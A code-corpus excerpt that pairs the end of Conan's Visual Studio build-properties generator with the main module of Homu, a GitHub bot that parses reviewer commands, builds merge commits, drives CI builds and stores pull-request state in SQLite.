<ConanPreprocessorDefinitions>{definitions}</ConanPreprocessorDefinitions>
<ConanIncludeDirectories>{include_dirs}</ConanIncludeDirectories>
<ConanResourceDirectories>{res_dirs}</ConanResourceDirectories>
<ConanLibraryDirectories>{lib_dirs}</ConanLibraryDirectories>
<ConanBinaryDirectories>{bin_dirs}</ConanBinaryDirectories>
<ConanLibraries>{libs}</ConanLibraries>
<ConanSystemDeps>{system_libs}</ConanSystemDeps>
</PropertyGroup>
<PropertyGroup{condition}>
<LocalDebuggerEnvironment>PATH=%PATH%;{bin_dirs}</LocalDebuggerEnvironment>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<ItemDefinitionGroup{condition}>
<ClCompile>
<AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<AdditionalLibraryDirectories>$(ConanLibraryDirectories)%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<AdditionalDependencies>$(ConanLibraries)%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>$(ConanSystemDeps)%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalOptions>$(ConanLinkerFlags) %(AdditionalOptions)</AdditionalOptions>
</Link>
<Midl>
<AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</Midl>
<ResourceCompile>
<AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions>
</ResourceCompile>
</ItemDefinitionGroup>'''
item_template = '''
<Conan-{name}-Root>{root_dir}</Conan-{name}-Root>'''
def _format_items(self):
sections = []
for dep_name, cpp_info in self._deps_build_info.dependencies:
fields = {
'root_dir': cpp_info.rootpath,
'name': dep_name.replace(".", "-")
}
section = self.item_template.format(**fields)
sections.append(section)
return "".join(sections)
@property
def filename(self):
return BUILD_INFO_VISUAL_STUDIO
def _format_properties(self, build_info, condition):
def has_valid_ext(lib):
ext = os.path.splitext(lib)[1]
return ext in VALID_LIB_EXTENSIONS
fields = {
'conan_package_name': self.conanfile.name if self.conanfile.name else "",
'conan_package_version': self.conanfile.version if self.conanfile.version else "",
'condition': condition,
'bin_dirs': "".join("%s;" % p for p in build_info.bin_paths),
'res_dirs': "".join("%s;" % p for p in build_info.res_paths),
'include_dirs': "".join("%s;" % p for p in build_info.include_paths),
'lib_dirs': "".join("%s;" % p for p in build_info.lib_paths),
'libs': "".join(['%s.lib;' % lib if not has_valid_ext(lib)
else '%s;' % lib for lib in build_info.libs]),
'system_libs': "".join(['%s.lib;' % sys_dep if not has_valid_ext(sys_dep)
else '%s;' % sys_dep for sys_dep in build_info.system_libs]),
'definitions': "".join("%s;" % d for d in build_info.defines),
'compiler_flags': " ".join(build_info.cxxflags + build_info.cflags),
'linker_flags': " ".join(build_info.sharedlinkflags),
'exe_flags': " ".join(build_info.exelinkflags)
}
formatted_template = self.properties_template.format(**fields)
return formatted_template
@property
def content(self):
per_item_props = self._format_items()
properties = [self._format_properties(self._deps_build_info, condition='')]
for config, cpp_info in self._deps_build_info.configs.items():
condition = " Condition=\"'$(Configuration)' == '%s'\"" % config
properties.append(self._format_properties(cpp_info, condition=condition))
fields = {
'item_properties': per_item_props,
'properties': '\n'.join(properties)
}
formatted_template = self.template.format(**fields)
userprofile = os.getenv("USERPROFILE")
if userprofile:
userprofile = userprofile.replace("\\", "\\\\")
formatted_template = re.sub(userprofile, "$(USERPROFILE)", formatted_template,
flags=re.I)
return formatted_template
|
conan-io/conan
|
conans/client/generators/visualstudio.py
|
Python
|
mit
| 5,803 | 0.00224 |
import argparse
import github3
import toml
import json
import re
from . import utils
import logging
from threading import Thread, Lock
import time
import traceback
import sqlite3
import requests
from contextlib import contextmanager
from itertools import chain
from queue import Queue
import os
import subprocess
from .git_helper import SSH_KEY_FILE
import shlex
import sys
STATUS_TO_PRIORITY = {
'success': 0,
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
TEST_TIMEOUT = 3600 * 10
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(repo_cfg['buildbot']['url'] + '/login', allow_redirects=False, data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
db_query_lock = Lock()
def db_query(db, *args):
with db_query_lock:
db.execute(*args)
class PullReqState:
num = 0
priority = 0
rollup = False
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
delegate = ''
def __init__(self, num, head_sha, status, db, repo_label, mergeable_que, gh, owner, name, repos):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.db = db
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.test_started = time.time() # FIXME: Save in the local database
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
return 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
1 if self.rollup else 0,
-self.priority,
self.num,
]
def __lt__(self, other):
return self.sort_key() < other.sort_key()
def get_issue(self):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
return issue
def add_comment(self, text):
self.get_issue().create_comment(text)
def set_status(self, status):
self.status = status
db_query(self.db, 'UPDATE pull SET status = ? WHERE repo = ? AND num = ?', [self.status, self.repo_label, self.num])
# FIXME: self.try_ should also be saved in the database
if not self.try_:
db_query(self.db, 'UPDATE pull SET merge_sha = ? WHERE repo = ? AND num = ?', [self.merge_sha, self.repo_label, self.num])
def get_status(self):
return 'approved' if self.status == '' and self.approved_by and self.mergeable is not False else self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
db_query(self.db, 'INSERT OR REPLACE INTO mergeable (repo, num, mergeable) VALUES (?, ?, ?)', [self.repo_label, self.num, self.mergeable])
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
db_query(self.db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?', [self.repo_label, self.num])
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
db_query(self.db, 'DELETE FROM build_res WHERE repo = ? AND num = ?', [self.repo_label, self.num])
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
db_query(self.db, 'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', [
self.repo_label,
self.num,
builder,
res,
url,
self.merge_sha,
])
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label]
if not repo:
self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name)
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def save(self):
db_query(self.db, 'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', [
self.repo_label,
self.num,
self.status,
self.merge_sha,
self.title,
self.body,
self.head_sha,
self.head_ref,
self.base_ref,
self.assignee,
self.approved_by,
self.priority,
self.try_,
self.rollup,
self.delegate,
])
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = issue.body
def fake_merge(self, repo_cfg):
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
msg = '''!!! Temporary commit !!!
This commit is artifically made up to mark PR {} as merged.
If this commit remained in the history, you can safely reset HEAD to {}.
This is possibly due to protected branches, which forbids force-pushing.
You are advised to turn off protected branches, or disable certain Homu
features that require force-pushing, such as linear history or
auto-squashing.
[ci skip]'''.format(self.num, self.merge_sha)
def inner():
# `merge()` will return `None` if the `head_sha` commit is already part of the `base_ref` branch, which means rebasing didn't have to modify the original commit
merge_commit = self.get_repo().merge(self.base_ref, self.head_sha, msg)
if merge_commit:
self.fake_merge_sha = merge_commit.sha
def fail(err):
self.add_comment(':warning: Unable to mark this PR as merged. Closing instead. ({})'.format(err))
self.get_issue().close()
utils.retry_until(inner, fail, self)
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
def parse_commands(body, username, repo_cfg, state, my_username, db, states, *, realtime=False, sha=''):
try_only = False
if username not in repo_cfg['reviewers'] and username != my_username:
if username.lower() == state.delegate.lower():
pass # Allow users who have been delegated review powers
elif username in repo_cfg.get('try_users', []):
try_only = True
else:
return False
state_changed = False
words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x))
for i, word in reversed(list(enumerate(words))):
found = True
if word == 'r+' or word.startswith('r='):
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
if not sha and i+1 < len(words):
cur_sha = sha_or_blank(words[i+1])
else:
cur_sha = sha
approver = word[len('r='):] if word.startswith('r=') else username
# Ignore "r=me"
if approver == 'me':
continue
# Sometimes, GitHub sends the head SHA of a PR as 0000000 through the webhook. This is
# called a "null commit", and seems to happen when GitHub internally encounters a race
# condition. Last time, it happened when squashing commits in a PR. In this case, we
# just try to retrieve the head SHA manually.
if all(x == '0' for x in state.head_sha):
if realtime: state.add_comment(':bangbang: Invalid head SHA found, retrying: `{}`'.format(state.head_sha))
state.head_sha = state.get_repo().pull_request(state.num).head.sha
state.save()
assert any(x != '0' for x in state.head_sha)
if state.approved_by and realtime and username != my_username:
for _state in states[state.repo_label].values():
if _state.status == 'pending':
break
else:
_state = None
lines = []
if state.status in ['failure', 'error']:
lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.')
if _state:
if state == _state:
lines.append('- This pull request is currently being tested. If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.')
else:
lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num))
if lines: lines.insert(0, '')
lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.')
state.add_comment('\n'.join(lines))
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(':scream_cat: {} Please try again with `{:.7}`.'.format(msg, state.head_sha))
else:
state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha))
elif word == 'r-':
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
state.approved_by = ''
state.save()
elif word.startswith('p='):
try: state.priority = int(word[len('p='):])
except ValueError: pass
state.save()
elif word.startswith('delegate='):
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
state.delegate = word[len('delegate='):]
state.save()
if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate))
elif word == 'delegate-':
state.delegate = ''
state.save()
elif word == 'delegate+':
if try_only:
if realtime: state.add_comment(':key: Insufficient privileges')
continue
state.delegate = state.get_repo().pull_request(state.num).user.login
state.save()
if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate))
elif word == 'retry' and realtime:
state.set_status('')
elif word in ['try', 'try-'] and realtime:
state.try_ = word == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
elif word in ['rollup', 'rollup-']:
state.rollup = word == 'rollup'
state.save()
elif word == 'force' and realtime:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', allow_redirects=False, data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())),
})
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
if mat:
err = mat.group(1).strip()
if not err: err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(':bomb: Buildbot returned an error: `{}`'.format(err))
elif word == 'clean' and realtime:
state.merge_sha = ''
state.init_build_res([])
state.save()
else:
found = False
if found:
state_changed = True
words[i] = ''
return state_changed
def git_push(fpath, branch, state):
merge_sha = subprocess.check_output(['git', '-C', fpath, 'rev-parse', 'HEAD']).decode('ascii').strip()
if utils.silent_call(['git', '-C', fpath, 'push', '-f', 'origin', branch]):
utils.logged_call(['git', '-C', fpath, 'branch', '-f', 'homu-tmp', branch])
utils.logged_call(['git', '-C', fpath, 'push', '-f', 'origin', 'homu-tmp'])
def inner():
utils.github_create_status(state.get_repo(), merge_sha, 'success', '', 'Branch protection bypassed', context='homu')
def fail(err):
state.add_comment(':boom: Unable to create a status for {} ({})'.format(merge_sha, err))
utils.retry_until(inner, fail, state)
utils.logged_call(['git', '-C', fpath, 'push', '-f', 'origin', branch])
return merge_sha
def create_merge(state, repo_cfg, branch, git_cfg):
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
state.refresh()
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title,
state.body,
)
desc = 'Merge conflict'
if git_cfg['local_git']:
pull = state.get_repo().pull_request(state.num)
fpath = 'cache/{}/{}'.format(repo_cfg['owner'], repo_cfg['name'])
url = 'git@github.com:{}/{}.git'.format(repo_cfg['owner'], repo_cfg['name'])
os.makedirs(os.path.dirname(SSH_KEY_FILE), exist_ok=True)
with open(SSH_KEY_FILE, 'w') as fp:
fp.write(git_cfg['ssh_key'])
os.chmod(SSH_KEY_FILE, 0o600)
if not os.path.exists(fpath):
utils.logged_call(['git', 'init', fpath])
utils.logged_call(['git', '-C', fpath, 'remote', 'add', 'origin', url])
utils.logged_call(['git', '-C', fpath, 'fetch', 'origin', state.base_ref, 'pull/{}/head'.format(state.num)])
utils.silent_call(['git', '-C', fpath, 'rebase', '--abort'])
utils.silent_call(['git', '-C', fpath, 'merge', '--abort'])
if repo_cfg.get('linear', False):
utils.logged_call(['git', '-C', fpath, 'checkout', '-B', branch, state.head_sha])
try:
utils.logged_call(['git', '-C', fpath, '-c', 'user.name=' + git_cfg['name'], '-c', 'user.email=' + git_cfg['email'], 'rebase'] + (['-i', '--autosquash'] if repo_cfg.get('autosquash', False) else []) + [base_sha])
except subprocess.CalledProcessError:
if repo_cfg.get('autosquash', False):
utils.silent_call(['git', '-C', fpath, 'rebase', '--abort'])
if utils.silent_call(['git', '-C', fpath, 'rebase', base_sha]) == 0:
desc = 'Auto-squashing failed'
else:
text = '\nPull request: #{}\nApproved by: {}'.format(state.num, '<try>' if state.try_ else state.approved_by)
msg_code = 'cat && echo {}'.format(shlex.quote(text))
env_code = 'export GIT_COMMITTER_NAME={} && export GIT_COMMITTER_EMAIL={} && unset GIT_COMMITTER_DATE'.format(shlex.quote(git_cfg['name']), shlex.quote(git_cfg['email']))
utils.logged_call(['git', '-C', fpath, 'filter-branch', '-f', '--msg-filter', msg_code, '--env-filter', env_code, '{}..'.format(base_sha)])
return git_push(fpath, branch, state)
else:
utils.logged_call(['git', '-C', fpath, 'checkout', '-B', 'homu-tmp', state.head_sha])
ok = True
if repo_cfg.get('autosquash', False):
try:
merge_base_sha = subprocess.check_output(['git', '-C', fpath, 'merge-base', base_sha, state.head_sha]).decode('ascii').strip()
utils.logged_call(['git', '-C', fpath, '-c', 'user.name=' + git_cfg['name'], '-c', 'user.email=' + git_cfg['email'], 'rebase', '-i', '--autosquash', '--onto', merge_base_sha, base_sha])
except subprocess.CalledProcessError:
desc = 'Auto-squashing failed'
ok = False
if ok:
utils.logged_call(['git', '-C', fpath, 'checkout', '-B', branch, base_sha])
try:
utils.logged_call(['git', '-C', fpath, '-c', 'user.name=' + git_cfg['name'], '-c', 'user.email=' + git_cfg['email'], 'merge', 'heads/homu-tmp', '-m', merge_msg])
except subprocess.CalledProcessError:
pass
else:
return git_push(fpath, branch, state)
else:
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
raise RuntimeError('local_git must be turned on to use this feature')
if branch != state.base_ref:
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
try: merge_commit = state.get_repo().merge(branch, state.head_sha, merge_msg)
except github3.models.GitHubError as e:
if e.code != 409: raise
else:
return merge_commit.sha if merge_commit else ''
state.set_status('error')
utils.github_create_status(state.get_repo(), state.head_sha, 'error', '', desc, context='homu')
state.add_comment(':lock: ' + desc)
return ''
def start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
if buildbot_slots[0]:
return True
assert state.head_sha == state.get_repo().pull_request(state.num).head.sha
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' in repo_cfg:
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
builders = repo_cfg['buildbot']['try_builders' if state.try_ else 'builders']
elif 'travis' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['travis']
elif 'status' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['status']
else:
raise RuntimeError('Invalid configuration')
if state.approved_by and builders == ['status'] and repo_cfg['status']['context'] == 'continuous-integration/travis-ci/push':
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context == 'continuous-integration/travis-ci/pr':
if info.state == 'success':
mat = re.search('/builds/([0-9]+)$', info.target_url)
if mat:
url = 'https://api.travis-ci.org/{}/{}/builds/{}'.format(state.owner, state.name, mat.group(1))
res = requests.get(url)
travis_sha = json.loads(res.text)['commit']
travis_commit = state.get_repo().commit(travis_sha)
if travis_commit:
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if [travis_commit.parents[0]['sha'], travis_commit.parents[1]['sha']] == [base_sha, state.head_sha]:
try: merge_sha = create_merge(state, repo_cfg, state.base_ref, git_cfg)
except subprocess.CalledProcessError:
print('* Unable to create a merge commit for the exempted PR: {}'.format(state))
traceback.print_exc()
else:
if merge_sha:
desc = 'Test exempted'
url = info.target_url
state.set_status('success')
utils.github_create_status(state.get_repo(), state.head_sha, 'success', url, desc, context='homu')
state.add_comment(':zap: {} - [{}]({})'.format(desc, 'status', url))
state.merge_sha = merge_sha
state.save()
state.fake_merge(repo_cfg)
return True
break
merge_sha = create_merge(state, repo_cfg, branch, git_cfg)
if not merge_sha:
return False
state.init_build_res(builders)
state.merge_sha = merge_sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
logger.info('Starting build of {}/{}#{} on {}: {}'.format(state.owner,
state.name,
state.num, branch, state.merge_sha))
state.test_started = time.time()
state.set_status('pending')
desc = '{} commit {:.7} with merge {:.7}...'.format('Trying' if state.try_ else 'Testing', state.head_sha, state.merge_sha)
utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', desc, context='homu')
state.add_comment(':hourglass: ' + desc)
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
parent_shas = [x['sha'] for x in state.get_repo().commit(state.merge_sha).parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(state.get_repo(), 'tags/homu-tmp', state.merge_sha, force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err))
return False
state.test_started = time.time()
state.set_status('pending')
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders))
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders))
utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', '{}{}...'.format(msg_1, msg_3), context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, *args)
def process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
if state.status == 'pending' and not state.try_:
break
elif state.status == 'success' and hasattr(state, 'fake_merge_sha'):
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
return
elif state.status == 'success' and state.try_ and state.approved_by:
state.try_ = False
state.save()
if start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
if state.status == 'success':
continue
mergeable = state.get_repo().pull_request(state.num).mergeable
if mergeable is None:
time.sleep(5)
mergeable = state.get_repo().pull_request(state.num).mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat: issue_or_commit = '#' + mat.group(1)
else: issue_or_commit = cause['sha'][:7]
else:
issue_or_commit = ''
state.add_comment(':umbrella: The latest upstream changes{} made this pull request unmergeable. Please resolve the merge conflicts.'.format(
' (presumably {})'.format(issue_or_commit) if issue_or_commit else '',
))
state.set_mergeable(mergeable, que=False)
except:
print('* Error while fetching mergeability')
traceback.print_exc()
finally:
mergeable_que.task_done()
def check_timeout(states, queue_handler):
while True:
try:
for repo_label, repo_states in states.items():
for num, state in repo_states.items():
if state.status == 'pending' and time.time() - state.test_started >= TEST_TIMEOUT:
print('* Test timed out: {}'.format(state))
state.merge_sha = ''
state.save()
state.set_status('failure')
desc = 'Test timed out'
utils.github_create_status(state.get_repo(), state.head_sha, 'failure', '', desc, context='homu')
state.add_comment(':boom: {}'.format(desc))
queue_handler()
except:
print('* Error while checking timeout')
traceback.print_exc()
finally:
time.sleep(3600)
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, db, mergeable_que, my_username, repo_labels):
logger.info('Synchronizing {}...'.format(repo_label))
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
saved_states = {}
for num, state in states[repo_label].items():
saved_states[num] = {
'merge_sha': state.merge_sha,
'build_res': state.build_res,
}
states[repo_label] = {}
repos[repo_label] = repo
for pull in repo.iter_pulls(state='open'):
db_query(db, 'SELECT status FROM pull WHERE repo = ? AND num = ?', [repo_label, pull.number])
row = db.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repos)
state.title = pull.title
state.body = pull.body
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
db,
states,
sha=comment.original_commit_id,
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
db,
states,
)
saved_state = saved_states.get(pull.number)
if saved_state:
for key, val in saved_state.items():
setattr(state, key, val)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
def arguments():
parser = argparse.ArgumentParser(description =
'A bot that integrates with GitHub and '
'your favorite continuous integration service')
parser.add_argument('-v', '--verbose',
action='store_true', help='Enable more verbose logging')
return parser.parse_args()
def main():
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
try:
with open('cfg.toml') as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
gh = github3.login(token=cfg['github']['access_token'])
user = gh.user()
try: user_email = [x for x in gh.iter_emails() if x['primary']][0]['email']
except IndexError:
raise RuntimeError('Primary email not set, or "user" scope not granted')
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = user.login
repo_labels = {}
mergeable_que = Queue()
git_cfg = {
'name': user.name if user.name else user.login,
'email': user_email,
'ssh_key': cfg.get('git', {}).get('ssh_key', ''),
'local_git': cfg.get('git', {}).get('local_git', False),
}
db_conn = sqlite3.connect('main.db', check_same_thread=False, isolation_level=None)
db = db_conn.cursor()
db_query(db, '''CREATE TABLE IF NOT EXISTS pull (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
status TEXT NOT NULL,
merge_sha TEXT,
title TEXT,
body TEXT,
head_sha TEXT,
head_ref TEXT,
base_ref TEXT,
assignee TEXT,
approved_by TEXT,
priority INTEGER,
try_ INTEGER,
rollup INTEGER,
delegate TEXT,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS build_res (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
builder TEXT NOT NULL,
res INTEGER,
url TEXT NOT NULL,
merge_sha TEXT NOT NULL,
UNIQUE (repo, num, builder)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS mergeable (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
mergeable INTEGER NOT NULL,
UNIQUE (repo, num)
)''')
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
repo_states = {}
repos[repo_label] = None
db_query(db, 'SELECT num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha FROM pull WHERE repo = ?', [repo_label])
for num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha in db.fetchall():
state = PullReqState(num, head_sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repos)
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = bool(rollup)
state.delegate = delegate
if merge_sha:
if 'buildbot' in repo_cfg:
builders = repo_cfg['buildbot']['builders']
elif 'travis' in repo_cfg:
builders = ['travis']
elif 'status' in repo_cfg:
builders = ['status']
else:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
db_query(db, 'SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in db.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res: raise KeyError
if state.merge_sha != merge_sha: raise KeyError
except KeyError:
db_query(db, 'DELETE FROM build_res WHERE repo = ? AND num = ? AND builder = ?', [repo_label, num, builder])
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
db_query(db, 'SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in db.fetchall():
try: state = states[repo_label][num]
except KeyError:
db_query(db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?', [repo_label, num])
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
db_query(db, 'SELECT repo FROM pull GROUP BY repo')
for repo_label, in db.fetchall():
if repo_label not in repos:
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg)
